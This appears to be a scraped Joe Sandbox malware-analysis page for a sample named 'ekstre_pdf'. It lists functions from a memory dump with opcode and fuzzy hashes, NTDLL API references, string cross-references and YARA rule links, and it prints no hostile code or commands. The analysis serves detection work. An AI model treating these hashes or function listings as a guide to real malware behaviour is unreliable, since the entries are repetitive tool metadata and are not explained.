Opcode ID: 5413a140048509a0d318a972be371dc9920a68988a1e5208abfc6cd0f1eb8e5b
Instruction ID: 75484ab00ca3cca2ab707cd1a2251b1fbc1e752435ed31470b649119b5a9fcb5
Opcode Fuzzy Hash: 5413a140048509a0d318a972be371dc9920a68988a1e5208abfc6cd0f1eb8e5b
Instruction Fuzzy Hash: 50B112B56083408FD754CF68C580A5ABBE1FB88308F1489AEE8DACB352D775E945CB46

Uniqueness

Uniqueness Score: -1.00%

Function 340E55E0 Relevance: 1.7, APIs: 1, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 91f20f2c32323840c13f2b65f1dfdef03dce14048bb8bee9acc01b5f34373883
Instruction ID: a5515d81014579e29c259641af7ff58f2bddc821cad86d3a8e7d0c01cd895d46
Opcode Fuzzy Hash: 91f20f2c32323840c13f2b65f1dfdef03dce14048bb8bee9acc01b5f34373883
Instruction Fuzzy Hash: A8815C75B00705EFEB21CBE5CD80EAFBBF8AB48754F1009A9E615A7290DA70A950CB54

Uniqueness

Uniqueness Score: -1.00%

Function 34067623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d228dafe279a653e61d07fef3ee85f1d99ea83eb9d27307260df949ef304655f
Instruction ID: 979ade7b7756ad83db74af9397459b5af29f735c7bd6c366bfb9b7599619e074
Opcode Fuzzy Hash: d228dafe279a653e61d07fef3ee85f1d99ea83eb9d27307260df949ef304655f
Instruction Fuzzy Hash: F1616275B00606EFEB08DF78C580A9DFBB5FF48348F1482AAD41AA7350DB34A9518F95

Uniqueness

Uniqueness Score: -1.00%

Function 3406254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34062630

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 17d537e2db3e93d8a2964a0138d983288f9f4cd1c828823f6c716a2ca36f9a99
Instruction ID: 378f961d6c13b9e5f22997f3d2a4dd56bad5470ac9084ea826683e86651bba8b
Opcode Fuzzy Hash: 17d537e2db3e93d8a2964a0138d983288f9f4cd1c828823f6c716a2ca36f9a99
Instruction Fuzzy Hash: 28418C71A01704CFE721EF24CA50A49B7E6EF44358F1086DED05B9B2A0DB38AA81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 340E0443 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 340E04BC

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 71d4642958a3ca9f328607aff5afcf7716a1c263ba9fd86cbd95fbe11f0c7f13
Instruction ID: f7142b0a6c10fbd295e0c9fe9ffb49f57fa331a3cdb632916ceda53c38e46450
Opcode Fuzzy Hash: 71d4642958a3ca9f328607aff5afcf7716a1c263ba9fd86cbd95fbe11f0c7f13
Instruction Fuzzy Hash: 5941BCB26187109FE320DF29C940B9BBBE8FF88354F008A6AF598D7250D7308855CF92

Uniqueness

Uniqueness Score: -1.00%

Function 34064779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34064817

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 636d0a08315a9fd0effde5c41faffa4fa3184371338f70234b35275a28213da5
Instruction ID: da4161f073a6f5122624eff42626f3f0abae319506ac66f02ab1062dbb7e9bc9
Opcode Fuzzy Hash: 636d0a08315a9fd0effde5c41faffa4fa3184371338f70234b35275a28213da5
Instruction Fuzzy Hash: CD41C3747003418FE311CF28D994B2EBBE9EF81758F5044ADE94B872A1DB38D951CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 3405B420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3405B4AC

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 941a2d03eda70959beabe7a9aaab9cf7a620e26525c37078c3f6306c783e7844
Instruction ID: 0619f1c70c2f527be953606454acbec25d954e4d62b5b2f82c0beea7a6792544
Opcode Fuzzy Hash: 941a2d03eda70959beabe7a9aaab9cf7a620e26525c37078c3f6306c783e7844
Instruction Fuzzy Hash: BA31FF727042089FD721DF24C880A6A7BB9EF45364F1042E9EA449F2A1CB31FD42CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 340656E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34065762

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: df05dfcb087704f39deb03e67702122c55c6d2273766f3498ef0156dbbf0071e
Instruction ID: 2083b1a6a67b0c51238f1b74647268616692acee17021475de1b33b01135d070
Opcode Fuzzy Hash: df05dfcb087704f39deb03e67702122c55c6d2273766f3498ef0156dbbf0071e
Instruction Fuzzy Hash: 2131AE39711A05FFE7458FA4DA80E4DBBA6FF84258F405095E8029BA50CB35EC30CB85

Uniqueness

Uniqueness Score: -1.00%

Function 3410E750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3410E7B1

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 6f0420d0c5f4363787df2b5c05f4d0d549855acf8544265be0c441295e729a2e
Instruction ID: a78c605c20a0a8069f068e0cc5a3f8dd47c7ff8c2a9e1ca76354187164d0bacb
Opcode Fuzzy Hash: 6f0420d0c5f4363787df2b5c05f4d0d549855acf8544265be0c441295e729a2e
Instruction Fuzzy Hash: CC3187B5A44705CFC720DF1AC58098ABBE5FF89258F048AEEE4989B221D730DD05CF96

Uniqueness

Uniqueness Score: -1.00%

Function 34063536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 340635C1

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 5d5c44f1c635d55dd89f3122b752dd4b68ce565af27068c0fd7e20fe78ce17e3
Instruction ID: 0bb2f0304d040707991a0a0be185db805f28c1b44165136e418cdd4d2ccf4410
Opcode Fuzzy Hash: 5d5c44f1c635d55dd89f3122b752dd4b68ce565af27068c0fd7e20fe78ce17e3
Instruction Fuzzy Hash: 0321EE35311A409FE721AF24CA84B5ABBE5EF80B18F4141DDE8470B6A1CB74E948CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 340EA130 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 340EA19A

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 227bdea5f907fafc0df8887877f0e688826d857efda69d551c4fc109284fea18
Instruction ID: 0c459688a52af18f080fcfc633687c5370395934e58f161bd63c4c8f30b8bf44
Opcode Fuzzy Hash: 227bdea5f907fafc0df8887877f0e688826d857efda69d551c4fc109284fea18
Instruction Fuzzy Hash: B9018936211659AFDF029E94D840EDA3FA6FB8C754F058181FE1866220C632D9B1EF81

Uniqueness

Uniqueness Score: -1.00%

Function 340E60A0 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 340E6241

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9b03753dc1990f8c86a8fa0fadcdaf38959a882e54400b69c67f30f908e6e70d
Instruction ID: 74674477d5f20dc15cf2e4d70ca1763f8e726c0499b6c1c9f1d5f6e77c8abf2c
Opcode Fuzzy Hash: 9b03753dc1990f8c86a8fa0fadcdaf38959a882e54400b69c67f30f908e6e70d
Instruction Fuzzy Hash: F891A471B00614EFEB21CFA4DE81FAE77B8EF44754F5004A9F600AB291DB719954CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 3409A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 340D65D4

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 1636616870685259d8de503b33636fc9b4997c8db3e95ac8010489dfd620b814
Instruction ID: 87b55cda8debbbcb16169afe2460d2c9fa9ff8337accf3df2d9db6c3ec3f6fe1
Opcode Fuzzy Hash: 1636616870685259d8de503b33636fc9b4997c8db3e95ac8010489dfd620b814
Instruction Fuzzy Hash: 76715BB9F003099FEB14EFA8C9806DDBBF1BF59354F1089AEE405A7254EB319945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 3406965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

@, xrefs: 34069713

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
Instruction ID: a3211e906199481e06cfc6b467cbf716a5fea7ef6dc6086bf48d819b06fbf2ad
Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
Instruction Fuzzy Hash: DC615B75E00219EFEB11CFA5C940F9EBBF8EF44758F1041ADE812A7650D7788A01DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 340EF42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 340EF4E7

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
Instruction ID: bed7443b1d64b1f94dd26ead2c7ce1cd20c4a5e3acbe2f18af37b903baae3399
Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
Instruction Fuzzy Hash: D751BDB2704B01BFE3218F64C940F6BB7E8FB84794F4009ADB64097290EB75E954CB96

Uniqueness

Uniqueness Score: -1.00%

Function 3407E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 3407E5C4

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 4e901d5a13b3f09db21a1bee3501a49b284c628ea87fbb37ea742ad35eba1a75
Instruction ID: 6e999063f79bd9f77094ab862c5a6ebc6342e7f6e73c0164dcbaa394c9159b02
Opcode Fuzzy Hash: 4e901d5a13b3f09db21a1bee3501a49b284c628ea87fbb37ea742ad35eba1a75
Instruction Fuzzy Hash: CE41AF7171A3019FE710DA71C980F5FBBE8AF88758F404AADF584E7180EA74D9048B9B

Uniqueness

Uniqueness Score: -1.00%

Function 340941BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 34094220

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction ID: 6a940bfdc93a745e4f10346d97b56aa4cdd07e7875037ab2f859175bd5011d84
Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction Fuzzy Hash: 9E516A71604710AFD320CF69C841A6BBBF8FF48714F40896EFA95976A0E774E914CB92

Uniqueness

Uniqueness Score: -1.00%

Function 340E9429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 340E94F0

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 372e1cbc6ae994d0d49f59d7c0bac7bf65c7771c82c777aecb52d0ac76038955
Instruction ID: 17962db7f08ac3b6297fa0f9a4e67b61266066cc56d6eb044bbb6defb9546e13
Opcode Fuzzy Hash: 372e1cbc6ae994d0d49f59d7c0bac7bf65c7771c82c777aecb52d0ac76038955
Instruction Fuzzy Hash: 6F31C0B6700601DFE7149F599850B767BE5EB88354F9080EAE688EF385E631CDC18B54

Uniqueness

Uniqueness Score: -1.00%

Function 34097425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 340D442D

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
Instruction ID: eb66b94a5f6b284646c4343b41d2629f6e7c175e680e4bcc5aab5495ab2aa6e7
Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
Instruction Fuzzy Hash: 8641AE76B00615DBEB118F88C480BAEBBF4EF41745F00449AE84097251DB34A941D792

Uniqueness

Uniqueness Score: -1.00%

Function 3409360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

Flst, xrefs: 34093651

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: Flst
API String ID: 0-2374792617
Opcode ID: a2e15847ca5bdeb1cb88d83c46678b5ae76b91942f4703950e2bd5f81e12fa73
Instruction ID: 5cd6976616ebe0cee33f8224ed67588ae70ae46be612f3f1705a7be1ff8d7b67
Opcode Fuzzy Hash: a2e15847ca5bdeb1cb88d83c46678b5ae76b91942f4703950e2bd5f81e12fa73
Instruction Fuzzy Hash: EA41C7B1705301DFE304CF28C180A5AFBE8EF8A714F5081AEE458CB2A5DB71D846CB92

Uniqueness

Uniqueness Score: -1.00%

Function 340596E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

3<w3<w, xrefs: 34059757

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 3<w3<w
API String ID: 3446177414-463266502
Opcode ID: ccb9e90413b67eb3fec9ac9c851f8740e92dff96f6807b4e5354bfe71ca93a79
Instruction ID: 967aa4253952c09e617e762f05e03c4bee3123c772a33f03a94ea66a1c3292f2
Opcode Fuzzy Hash: ccb9e90413b67eb3fec9ac9c851f8740e92dff96f6807b4e5354bfe71ca93a79
Instruction Fuzzy Hash: 0621FF36B00B14AFD3218F58C940B5A7BF8EB84B64F1104EAE595AB360DB30D900CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 340DC6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 340DC722

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 5db0ddb432bbba56c5b325196389d811eda1d69db525e08b2b4831571ab8fd06
Instruction ID: 271d312e06e54a3bf39b416f0380f0736be64ef2f89291bf1a7e3e52ec3c0e39
Opcode Fuzzy Hash: 5db0ddb432bbba56c5b325196389d811eda1d69db525e08b2b4831571ab8fd06
Instruction Fuzzy Hash: 1231D17AB04759EFEB15CA58C945E6FB7B4EF82B20F0141A9E805A7250D7319E08C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 340B717A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa2acfe02de5514dbd6fa3905be1a226971099df0e868fa9055bd264499b389c
Instruction ID: e65d75a42b55ad6c4e450dbeb20e79b29f4226c84ab0e5fc7aff19a801da0acb
Opcode Fuzzy Hash: aa2acfe02de5514dbd6fa3905be1a226971099df0e868fa9055bd264499b389c
Instruction Fuzzy Hash: 04428175B006168FEF08CF59C490AAEB7F6FF88354B5485ADD991AB340DB34E842CB94

Uniqueness

Uniqueness Score: -1.00%

Function 3408B1E0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71392a657f3d0a00dccfe3adba5783c2312641efb658d5f2c0a5e55b4ea35f79
Instruction ID: 51d73d5169916083f4a66bed5c7417222e3b85a69cadfd8f19940203152e7274
Opcode Fuzzy Hash: 71392a657f3d0a00dccfe3adba5783c2312641efb658d5f2c0a5e55b4ea35f79
Instruction Fuzzy Hash: 7B328DB6F00219DFDB14DFA8CA80BAEBBB5FF44744F1401A9E815AB350EB359911CB91

Uniqueness

Uniqueness Score: -1.00%

Function 34072760 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66530228cabbb177a845cee2b0059fa635048ac4f52f3b587b42180826013aa7
Instruction ID: 7aaaeffbea382f455a8cfebffdca2b3c8cd53d188fffd10d5374f367324250d6
Opcode Fuzzy Hash: 66530228cabbb177a845cee2b0059fa635048ac4f52f3b587b42180826013aa7
Instruction Fuzzy Hash: 8332BB74B00754CFEB24CBA5C950BAEBBF6AF84704F2089ADD4459F2A4DB35AC42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 3412124C Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff8e6a2ef09e988d5aa77f123ce20dadf8518b77fa9af9b65c15aaf0c208d915
Instruction ID: b5eb66f7d820e6dda6b19e2560f83f1b4520b38753bc7a57a1483a6be0719f9d
Opcode Fuzzy Hash: ff8e6a2ef09e988d5aa77f123ce20dadf8518b77fa9af9b65c15aaf0c208d915
Instruction Fuzzy Hash: 4F229E75B00A168FDB49CF59C4D0AAEB7B2BF89344F2485ADD855DB344DB30E942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 340F84BB Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 589b373300a4073754f9602ed587d87c8716e25c7c085f1e8c83d2ea8ecb27d4
Instruction ID: 950316363cdd93c3bb09b147b50ab86aa93118041f9265aba0b7410b53d5f458
Opcode Fuzzy Hash: 589b373300a4073754f9602ed587d87c8716e25c7c085f1e8c83d2ea8ecb27d4
Instruction Fuzzy Hash: D1D1F276F006098FEB04CF69CC81BEEB7F5AF88354F5481B9D855A7240EB36E9158B60

Uniqueness

Uniqueness Score: -1.00%

Function 3406D700 Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
